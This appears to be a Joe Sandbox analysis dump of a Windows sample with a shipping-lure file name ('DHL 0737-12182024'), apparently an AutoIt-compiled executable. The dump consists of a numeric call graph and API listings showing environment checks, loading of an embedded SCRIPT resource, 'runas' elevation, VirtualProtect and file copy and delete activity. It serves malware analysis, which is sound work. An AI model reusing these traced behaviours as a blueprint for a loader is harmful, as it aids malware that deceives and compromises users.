82 API calls __wsopen_s 97691->98328 98304 82ac91 97692->98304 97695 8704f5 97708 87055a 97695->97708 98329 83d217 235 API calls 97695->98329 97696 82c7da 97702 83fe0b 22 API calls 97696->97702 97697 887120 22 API calls 97699 82c039 ISource __fread_nolock 97697->97699 97699->97695 97699->97696 97699->97697 97704 82c808 __fread_nolock 97699->97704 97707 82af8a 22 API calls 97699->97707 97699->97708 97709 87091a 97699->97709 97711 83fddb 22 API calls 97699->97711 97714 82ec40 235 API calls 97699->97714 
97715 8708a5 97699->97715 97719 870591 97699->97719 97722 8708f6 97699->97722 97725 82aceb 23 API calls 97699->97725 97726 82c237 97699->97726 97729 82c603 97699->97729 97735 8709bf 97699->97735 97737 82bbe0 40 API calls 97699->97737 97741 83fe0b 22 API calls 97699->97741 98308 82ad81 97699->98308 98332 887099 22 API calls __fread_nolock 97699->98332 98333 8a5745 54 API calls _wcslen 97699->98333 98334 83aa42 22 API calls ISource 97699->98334 98335 88f05c 40 API calls 97699->98335 98336 82a993 41 API calls 97699->98336 97702->97704 97710 83fe0b 22 API calls 97704->97710 97707->97699 97708->97729 98330 89359c 82 API calls __wsopen_s 97708->98330 98339 893209 23 API calls 97709->98339 97740 82c350 ISource __fread_nolock 97710->97740 97711->97699 97714->97699 97716 82ec40 235 API calls 97715->97716 97717 8708cf 97716->97717 97717->97729 98337 82a81b 41 API calls 97717->98337 98331 89359c 82 API calls __wsopen_s 97719->98331 98338 89359c 82 API calls __wsopen_s 97722->98338 97725->97699 97727 82c253 97726->97727 97728 82a8c7 22 API calls 97726->97728 97730 870976 97727->97730 97733 82c297 ISource 97727->97733 97728->97727 97729->97579 97732 82aceb 23 API calls 97730->97732 97732->97735 97734 82aceb 23 API calls 97733->97734 97733->97735 97736 82c335 97734->97736 97735->97729 98340 89359c 82 API calls __wsopen_s 97735->98340 97736->97735 97738 82c342 97736->97738 97737->97699 98315 82a704 97738->98315 97742 82c3ac 97740->97742 98326 83ce17 22 API calls ISource 97740->98326 97741->97699 97742->97579 97743->97579 97744->97579 97763 82ec76 ISource 97745->97763 97746 8400a3 29 API calls pre_c_initialization 97746->97763 97747 83fddb 22 API calls 97747->97763 97748 82fef7 97753 82a8c7 22 API calls 97748->97753 97762 82ed9d ISource 97748->97762 97751 874600 97758 82a8c7 22 API calls 97751->97758 97751->97762 97752 874b0b 98366 89359c 82 API calls __wsopen_s 97752->98366 97753->97762 97756 840242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 
WaitForSingleObjectEx EnterCriticalSection 97756->97763 97757 82a8c7 22 API calls 97757->97763 97758->97762 97760 82fbe3 97760->97762 97764 874bdc 97760->97764 97768 82f3ae ISource 97760->97768 97761 82a961 22 API calls 97761->97763 97762->97579 97763->97746 97763->97747 97763->97748 97763->97751 97763->97752 97763->97756 97763->97757 97763->97760 97763->97761 97763->97762 97766 874beb 97763->97766 97767 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97763->97767 97763->97768 98363 8301e0 235 API calls 2 library calls 97763->98363 98364 8306a0 41 API calls ISource 97763->98364 98367 89359c 82 API calls __wsopen_s 97764->98367 98368 89359c 82 API calls __wsopen_s 97766->98368 97767->97763 97768->97762 98365 89359c 82 API calls __wsopen_s 97768->98365 97769->97579 97770->97593 97771->97593 97772->97593 97773->97608 97774->97608 97775->97608 97776->97605 97777->97613 97778->97608 97779->97608 97780->97608 97781->97608 97782->97608 97783->97608 97907 88dbbe lstrlenW 97784->97907 97788 827510 53 API calls 97787->97788 97789 89f126 97788->97789 97912 829e90 97789->97912 97791 89f136 97792 89f15b 97791->97792 97793 82ec40 235 API calls 97791->97793 97795 89f15f 97792->97795 97940 829c6e 22 API calls 97792->97940 97793->97792 97795->97670 97950 8a7f59 97796->97950 97798 8a95af 97798->97670 97800 82a961 22 API calls 97799->97800 97801 896f1d 97800->97801 97802 82a961 22 API calls 97801->97802 97803 896f26 97802->97803 97804 896f3a 97803->97804 98209 82b567 39 API calls 97803->98209 97806 827510 53 API calls 97804->97806 97813 896f57 _wcslen 97806->97813 97807 896fbc 97809 827510 53 API calls 97807->97809 97808 8970bf 97810 824ecb 94 API calls 97808->97810 97811 896fc8 97809->97811 97812 8970d0 97810->97812 97816 82a8c7 22 API calls 97811->97816 97820 896fdb 97811->97820 97814 8970e5 97812->97814 97817 824ecb 94 API calls 97812->97817 97813->97807 97813->97808 97878 8970e9 97813->97878 97815 82a961 22 API calls 97814->97815 
97814->97878 97818 89711a 97815->97818 97816->97820 97817->97814 97819 82a961 22 API calls 97818->97819 97823 897126 97819->97823 97821 897027 97820->97821 97824 897005 97820->97824 97827 82a8c7 22 API calls 97820->97827 97822 827510 53 API calls 97821->97822 97825 897034 97822->97825 97826 82a961 22 API calls 97823->97826 97828 8233c6 22 API calls 97824->97828 97829 89703d 97825->97829 97830 897047 97825->97830 97831 89712f 97826->97831 97827->97824 97832 89700f 97828->97832 97833 82a8c7 22 API calls 97829->97833 98210 88e199 GetFileAttributesW 97830->98210 97835 82a961 22 API calls 97831->97835 97836 827510 53 API calls 97832->97836 97833->97830 97838 897138 97835->97838 97839 89701b 97836->97839 97837 897050 97841 897063 97837->97841 97844 824c6d 22 API calls 97837->97844 97842 827510 53 API calls 97838->97842 97840 826350 22 API calls 97839->97840 97840->97821 97843 827510 53 API calls 97841->97843 97850 897069 97841->97850 97845 897145 97842->97845 97846 8970a0 97843->97846 97844->97841 98055 82525f 97845->98055 98211 88d076 57 API calls 97846->98211 97849 897166 98097 824c6d 97849->98097 97850->97878 97853 8971a9 97855 82a8c7 22 API calls 97853->97855 97854 824c6d 22 API calls 97856 897186 97854->97856 97857 8971ba 97855->97857 97856->97853 97859 826b57 22 API calls 97856->97859 97858 826350 22 API calls 97857->97858 97860 8971c8 97858->97860 97861 89719b 97859->97861 97862 826350 22 API calls 97860->97862 97863 826b57 22 API calls 97861->97863 97864 8971d6 97862->97864 97863->97853 97865 826350 22 API calls 97864->97865 97866 8971e4 97865->97866 97867 827510 53 API calls 97866->97867 97868 8971f0 97867->97868 98100 88d7bc 97868->98100 97870 897201 97871 88d4ce 4 API calls 97870->97871 97872 89720b 97871->97872 97873 827510 53 API calls 97872->97873 97877 897239 97872->97877 97874 897229 97873->97874 98154 892947 97874->98154 97876 824f39 68 API calls 97876->97878 97877->97876 97878->97670 97880 891e9f 97879->97880 97881 891ea4 97879->97881 98277 890f67 
97880->98277 97881->97670 97884 8a7f59 120 API calls 97883->97884 97885 8a959b 97884->97885 97885->97670 97886->97669 97887->97629 97888->97632 97890 82acf9 97889->97890 97894 82ad2a ISource 97889->97894 97891 82ad55 97890->97891 97892 82ad01 ISource 97890->97892 97893 82a8c7 22 API calls 97891->97893 97891->97894 97892->97894 97895 82ad21 97892->97895 97896 86fa48 97892->97896 97893->97894 97894->97643 97895->97894 97897 86fa3a VariantClear 97895->97897 97896->97894 98298 83ce17 22 API calls ISource 97896->98298 97897->97894 97899->97656 97900->97656 97901->97634 97902->97670 97903->97670 97904->97670 97905->97666 97906->97670 97908 88dbdc GetFileAttributesW 97907->97908 97909 88d4d5 97907->97909 97908->97909 97910 88dbe8 FindFirstFileW 97908->97910 97909->97670 97910->97909 97911 88dbf9 FindClose 97910->97911 97911->97909 97913 826270 22 API calls 97912->97913 97914 829eb5 97913->97914 97915 829fd2 97914->97915 97920 86f7c4 97914->97920 97921 86f699 97914->97921 97923 82a405 97914->97923 97924 82a4a1 22 API calls 97914->97924 97927 82a6c3 22 API calls 97914->97927 97935 82a12c __fread_nolock 97914->97935 97936 82a587 22 API calls 97914->97936 97937 82aec9 22 API calls 97914->97937 97941 824573 41 API calls _wcslen 97914->97941 97944 8248c8 23 API calls 97914->97944 97945 8249bd 22 API calls __fread_nolock 97914->97945 97946 82a673 22 API calls 97914->97946 97942 82a4a1 22 API calls __fread_nolock 97915->97942 97917 829fec 97917->97791 97947 8896e2 84 API calls __wsopen_s 97920->97947 97928 83fddb 22 API calls 97921->97928 97923->97917 97949 8896e2 84 API calls __wsopen_s 97923->97949 97924->97914 97927->97914 97930 86f754 97928->97930 97929 86f7d2 97948 82a4a1 22 API calls __fread_nolock 97929->97948 97933 83fe0b 22 API calls 97930->97933 97932 86f7e8 97932->97917 97933->97935 97935->97920 97935->97923 97936->97914 97938 82a0db CharUpperBuffW 97937->97938 97943 82a673 22 API calls 97938->97943 97940->97795 97941->97914 97942->97917 97943->97914 97944->97914 
97945->97914 97946->97914 97947->97929 97948->97932 97949->97917 97951 827510 53 API calls 97950->97951 97952 8a7f90 97951->97952 97973 8a7fd5 ISource 97952->97973 97988 8a8cd3 97952->97988 97954 8a8281 97955 8a844f 97954->97955 97960 8a828f 97954->97960 98028 8a8ee4 60 API calls 97955->98028 97958 8a845e 97959 8a846a 97958->97959 97958->97960 97959->97973 98001 8a7e86 97960->98001 97961 827510 53 API calls 97978 8a8049 97961->97978 97966 8a82c8 98016 83fc70 97966->98016 97969 8a82e8 98022 89359c 82 API calls __wsopen_s 97969->98022 97970 8a8302 98023 8263eb 22 API calls 97970->98023 97973->97798 97974 8a82f3 GetCurrentProcess TerminateProcess 97974->97970 97975 8a8311 98024 826a50 22 API calls 97975->98024 97977 8a832a 97986 8a8352 97977->97986 98025 8304f0 22 API calls 97977->98025 97978->97954 97978->97961 97978->97973 98020 88417d 22 API calls __fread_nolock 97978->98020 98021 8a851d 42 API calls _strftime 97978->98021 97980 8a84c5 97980->97973 97984 8a84d9 FreeLibrary 97980->97984 97981 8a8341 98026 8a8b7b 75 API calls 97981->98026 97984->97973 97986->97980 97987 82aceb 23 API calls 97986->97987 98027 8304f0 22 API calls 97986->98027 98029 8a8b7b 75 API calls 97986->98029 97987->97986 97989 82aec9 22 API calls 97988->97989 97990 8a8cee CharLowerBuffW 97989->97990 98030 888e54 97990->98030 97994 82a961 22 API calls 97995 8a8d2a 97994->97995 98037 826d25 97995->98037 97997 8a8d3e 97998 8293b2 22 API calls 97997->97998 98000 8a8d48 _wcslen 97998->98000 97999 8a8e5e _wcslen 97999->97978 98000->97999 98050 8a851d 42 API calls _strftime 98000->98050 98002 8a7ea1 98001->98002 98006 8a7eec 98001->98006 98003 83fe0b 22 API calls 98002->98003 98004 8a7ec3 98003->98004 98005 83fddb 22 API calls 98004->98005 98004->98006 98005->98004 98007 8a9096 98006->98007 98008 8a92ab ISource 98007->98008 98013 8a90ba _strcat _wcslen 98007->98013 98008->97966 98009 82b6b5 39 API calls 98009->98013 98010 82b38f 39 API calls 98010->98013 98011 82b567 39 API calls 98011->98013 98012 
827510 53 API calls 98012->98013 98013->98008 98013->98009 98013->98010 98013->98011 98013->98012 98014 84ea0c 21 API calls ___std_exception_copy 98013->98014 98054 88efae 24 API calls _wcslen 98013->98054 98014->98013 98018 83fc85 98016->98018 98017 83fd1d VirtualProtect 98019 83fceb 98017->98019 98018->98017 98018->98019 98019->97969 98019->97970 98020->97978 98021->97978 98022->97974 98023->97975 98024->97977 98025->97981 98026->97986 98027->97986 98028->97958 98029->97986 98031 888e74 _wcslen 98030->98031 98032 888f63 98031->98032 98034 888ea9 98031->98034 98036 888f68 98031->98036 98032->97994 98032->98000 98034->98032 98051 83ce60 41 API calls 98034->98051 98036->98032 98052 83ce60 41 API calls 98036->98052 98038 826d91 98037->98038 98039 826d34 98037->98039 98040 8293b2 22 API calls 98038->98040 98039->98038 98041 826d3f 98039->98041 98047 826d62 __fread_nolock 98040->98047 98042 826d5a 98041->98042 98043 864c9d 98041->98043 98053 826f34 22 API calls 98042->98053 98044 83fddb 22 API calls 98043->98044 98046 864ca7 98044->98046 98048 83fe0b 22 API calls 98046->98048 98047->97997 98049 864cda 98048->98049 98050->97999 98051->98034 98052->98036 98053->98047 98054->98013 98056 82a961 22 API calls 98055->98056 98057 825275 98056->98057 98058 82a961 22 API calls 98057->98058 98059 82527d 98058->98059 98060 82a961 22 API calls 98059->98060 98061 825285 98060->98061 98062 82a961 22 API calls 98061->98062 98063 82528d 98062->98063 98064 863df5 98063->98064 98065 8252c1 98063->98065 98066 82a8c7 22 API calls 98064->98066 98067 826d25 22 API calls 98065->98067 98068 863dfe 98066->98068 98069 8252cf 98067->98069 98070 82a6c3 22 API calls 98068->98070 98071 8293b2 22 API calls 98069->98071 98074 825304 98070->98074 98072 8252d9 98071->98072 98073 826d25 22 API calls 98072->98073 98072->98074 98077 8252fa 98073->98077 98075 825325 98074->98075 98089 825349 98074->98089 98096 863e20 98074->98096 98079 824c6d 22 API calls 98075->98079 98075->98089 98076 826d25 22 API calls 
98080 82535a 98076->98080 98078 8293b2 22 API calls 98077->98078 98078->98074 98083 825332 98079->98083 98081 825370 98080->98081 98085 82a8c7 22 API calls 98080->98085 98082 825384 98081->98082 98087 82a8c7 22 API calls 98081->98087 98086 82538f 98082->98086 98090 82a8c7 22 API calls 98082->98090 98088 826d25 22 API calls 98083->98088 98083->98089 98084 826b57 22 API calls 98093 863ee0 98084->98093 98085->98081 98091 82a8c7 22 API calls 98086->98091 98094 82539a 98086->98094 98087->98082 98088->98089 98089->98076 98090->98086 98091->98094 98092 824c6d 22 API calls 98092->98093 98093->98089 98093->98092 98212 8249bd 22 API calls __fread_nolock 98093->98212 98094->97849 98096->98084 98098 82aec9 22 API calls 98097->98098 98099 824c78 98098->98099 98099->97853 98099->97854 98101 88d7d8 98100->98101 98102 88d7dd 98101->98102 98103 88d7f3 98101->98103 98105 82a8c7 22 API calls 98102->98105 98153 88d7ee 98102->98153 98104 82a961 22 API calls 98103->98104 98106 88d7fb 98104->98106 98105->98153 98107 82a961 22 API calls 98106->98107 98108 88d803 98107->98108 98109 82a961 22 API calls 98108->98109 98110 88d80e 98109->98110 98111 82a961 22 API calls 98110->98111 98112 88d816 98111->98112 98113 82a961 22 API calls 98112->98113 98114 88d81e 98113->98114 98115 82a961 22 API calls 98114->98115 98116 88d826 98115->98116 98117 82a961 22 API calls 98116->98117 98118 88d82e 98117->98118 98119 82a961 22 API calls 98118->98119 98120 88d836 98119->98120 98121 82525f 22 API calls 98120->98121 98122 88d84d 98121->98122 98123 82525f 22 API calls 98122->98123 98124 88d866 98123->98124 98125 824c6d 22 API calls 98124->98125 98126 88d872 98125->98126 98127 88d885 98126->98127 98128 8293b2 22 API calls 98126->98128 98129 824c6d 22 API calls 98127->98129 98128->98127 98130 88d88e 98129->98130 98131 88d89e 98130->98131 98132 8293b2 22 API calls 98130->98132 98133 88d8b0 98131->98133 98134 82a8c7 22 API calls 98131->98134 98132->98131 98135 826350 22 API calls 98133->98135 98134->98133 98136 
88d8bb 98135->98136 98213 88d978 22 API calls 98136->98213 98138 88d8ca 98214 88d978 22 API calls 98138->98214 98140 88d8dd 98141 824c6d 22 API calls 98140->98141 98142 88d8e7 98141->98142 98143 88d8ec 98142->98143 98144 88d8fe 98142->98144 98146 8233c6 22 API calls 98143->98146 98145 824c6d 22 API calls 98144->98145 98148 88d907 98145->98148 98147 88d8f9 98146->98147 98151 826350 22 API calls 98147->98151 98149 88d925 98148->98149 98150 8233c6 22 API calls 98148->98150 98152 826350 22 API calls 98149->98152 98150->98147 98151->98149 98152->98153 98153->97870 98155 892954 __wsopen_s 98154->98155 98156 83fe0b 22 API calls 98155->98156 98157 892971 98156->98157 98158 825722 22 API calls 98157->98158 98159 89297b 98158->98159 98160 89274e 27 API calls 98159->98160 98161 892986 98160->98161 98162 82511f 64 API calls 98161->98162 98163 89299b 98162->98163 98164 892a6c 98163->98164 98165 8929bf 98163->98165 98166 892e66 75 API calls 98164->98166 98167 892e66 75 API calls 98165->98167 98182 892a38 98166->98182 98168 8929c4 98167->98168 98175 892a75 ISource 98168->98175 98228 84d583 26 API calls 98168->98228 98170 8250f5 40 API calls 98171 892a91 98170->98171 98172 8250f5 40 API calls 98171->98172 98174 892aa1 98172->98174 98173 8929ed 98229 84d583 26 API calls 98173->98229 98176 8250f5 40 API calls 98174->98176 98175->97877 98178 892abc 98176->98178 98179 8250f5 40 API calls 98178->98179 98180 892acc 98179->98180 98181 8250f5 40 API calls 98180->98181 98183 892ae7 98181->98183 98182->98170 98182->98175 98184 8250f5 40 API calls 98183->98184 98185 892af7 98184->98185 98186 8250f5 40 API calls 98185->98186 98187 892b07 98186->98187 98188 8250f5 40 API calls 98187->98188 98189 892b17 98188->98189 98215 893017 GetTempPathW GetTempFileNameW 98189->98215 98191 892b22 98192 84e5eb 29 API calls 98191->98192 98202 892b33 98192->98202 98193 892bed 98194 84e678 67 API calls 98193->98194 98195 892bf8 98194->98195 98197 892bfe DeleteFileW 98195->98197 98198 892c12 98195->98198 98196 
8250f5 40 API calls 98196->98202 98197->98175 98199 892c91 CopyFileW 98198->98199 98205 892c18 98198->98205 98200 892cb9 DeleteFileW 98199->98200 98201 892ca7 DeleteFileW 98199->98201 98225 892fd8 CreateFileW 98200->98225 98201->98175 98202->98175 98202->98193 98202->98196 98216 84dbb3 98202->98216 98230 8922ce 79 API calls 98205->98230 98207 892c7c 98207->98200 98208 892c80 DeleteFileW 98207->98208 98208->98175 98209->97804 98210->97837 98211->97850 98212->98093 98213->98138 98214->98140 98215->98191 98217 84dbc1 98216->98217 98223 84dbdd 98216->98223 98218 84dbe3 98217->98218 98219 84dbcd 98217->98219 98217->98223 98231 84d9cc 98218->98231 98234 84f2d9 20 API calls _abort 98219->98234 98222 84dbd2 98235 8527ec 26 API calls pre_c_initialization 98222->98235 98223->98202 98226 892fff SetFileTime CloseHandle 98225->98226 98227 893013 98225->98227 98226->98227 98227->98175 98228->98173 98229->98182 98230->98207 98236 84d97b 98231->98236 98233 84d9f0 98233->98223 98234->98222 98235->98223 98237 84d987 CallCatchBlock 98236->98237 98244 84918d EnterCriticalSection 98237->98244 98239 84d995 98245 84d9f4 98239->98245 98243 84d9b3 __fread_nolock 98243->98233 98244->98239 98253 8549a1 98245->98253 98251 84d9a2 98252 84d9c0 LeaveCriticalSection __fread_nolock 98251->98252 98252->98243 98254 84d955 __fread_nolock 26 API calls 98253->98254 98255 8549b0 98254->98255 98256 85f89b __fread_nolock 26 API calls 98255->98256 98257 8549b6 98256->98257 98261 84da09 98257->98261 98274 853820 21 API calls 2 library calls 98257->98274 98259 854a15 98260 8529c8 _free 20 API calls 98259->98260 98260->98261 98262 84da3a 98261->98262 98263 84da4c 98262->98263 98268 84da24 98262->98268 98264 84da5a 98263->98264 98263->98268 98271 84da85 __fread_nolock 98263->98271 98275 84f2d9 20 API calls _abort 98264->98275 98266 84da5f 98276 8527ec 26 API calls pre_c_initialization 98266->98276 98273 854a56 62 API calls 98268->98273 98269 84dc0b 62 API calls 98269->98271 98270 84d955 __fread_nolock 26 API 

                                                                                             Control-flow Graph (rendered graph omitted; executed/not-executed node colouring not recoverable from the dump)
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0082430D
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • GetCurrentProcess.KERNEL32(?,008BCB64,00000000,?,?), ref: 00824422
                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00824429
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00824454
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00824466
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00824474
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0082447B
                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 008244A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                            • API String ID: 3290436268-3101561225
                                                                                            • Opcode ID: 9b2a3f859c2f214b279cd040f01edc874c6b4b3c93779191e1fd6bbf9bfe7125
                                                                                            • Instruction ID: 6620439c469568b439c75b4d7b1f4b0282fbb83ed60b3ddd0331295b852431c7
                                                                                            • Opcode Fuzzy Hash: 9b2a3f859c2f214b279cd040f01edc874c6b4b3c93779191e1fd6bbf9bfe7125
                                                                                            • Instruction Fuzzy Hash: 3CA1D36690A2D4CFCF12D77DBC499B67FE4FB36304B0858A9D081D3B22D2284548CB25

                                                                                             Control-flow Graph (rendered graph omitted; executed/not-executed node colouring not recoverable from the dump)
                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008250AA,?,?,00000000,00000000), ref: 008242B2
                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008250AA,?,?,00000000,00000000), ref: 008242C9
                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20), ref: 008635BE
                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20), ref: 008635D3
                                                                                            • LockResource.KERNEL32(008250AA,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20,?), ref: 008635E6
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                            • String ID: SCRIPT
                                                                                            • API String ID: 3051347437-3967369404
                                                                                            • Opcode ID: e1431972354002e484e454b0b6e6ecb89822238ef1ccb7ec2f36d45b513fbda9
                                                                                            • Instruction ID: f1158c7458b1f8d5593d6deac3ac52fbd1b3430076c008452163a4fa26abbc11
                                                                                            • Opcode Fuzzy Hash: e1431972354002e484e454b0b6e6ecb89822238ef1ccb7ec2f36d45b513fbda9
                                                                                            • Instruction Fuzzy Hash: 36117C70240701FFDB218B66EC48F677BBAFBC5B51F104269B412D6250DBB2DC408630

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00822B6B
                                                                                              • Part of subcall function 00823A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008F1418,?,00822E7F,?,?,?,00000000), ref: 00823A78
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,008E2224), ref: 00862C10
                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,008E2224), ref: 00862C17
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                            • String ID: runas
                                                                                            • API String ID: 448630720-4000483414
                                                                                            • Opcode ID: 4b65a632058d96f03bd0e14423e055e12fdd152aea58bf304bf386abe7c115fc
                                                                                            • Instruction ID: 1ba7dddadfd88595670ab0137debb311553ac907de8327c6454b20e05454c5c2
                                                                                            • Opcode Fuzzy Hash: 4b65a632058d96f03bd0e14423e055e12fdd152aea58bf304bf386abe7c115fc
                                                                                            • Instruction Fuzzy Hash: 0211E731104365EAC704FF78F8659BE7BA5FBA5310F44042DF182D21A2CF258689C753
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,00865222), ref: 0088DBCE
                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0088DBDD
                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 0088DBEE
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088DBFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2695905019-0
                                                                                            APIs
                                                                                            • GetInputState.USER32 ref: 0082D807
                                                                                            • timeGetTime.WINMM ref: 0082DA07
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB28
                                                                                            • TranslateMessage.USER32(?), ref: 0082DB7B
                                                                                            • DispatchMessageW.USER32(?), ref: 0082DB89
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0082DBB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                            • String ID:
                                                                                            • API String ID: 2189390790-0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00822D07
                                                                                            • RegisterClassExW.USER32(00000030), ref: 00822D31
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00822D42
                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00822D5F
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00822D6F
                                                                                            • LoadIconW.USER32(000000A9), ref: 00822D85
                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00822D94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                            • API String ID: 2914291525-1005189915

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0086039A: CreateFileW.KERNELBASE(00000000,00000000,?,00860704,?,?,00000000,?,00860704,00000000,0000000C), ref: 008603B7
                                                                                            • GetLastError.KERNEL32 ref: 0086076F
                                                                                            • __dosmaperr.LIBCMT ref: 00860776
                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00860782
                                                                                            • GetLastError.KERNEL32 ref: 0086078C
                                                                                            • __dosmaperr.LIBCMT ref: 00860795
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008607B5
                                                                                            • CloseHandle.KERNEL32(?), ref: 008608FF
                                                                                            • GetLastError.KERNEL32 ref: 00860931
                                                                                            • __dosmaperr.LIBCMT ref: 00860938
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
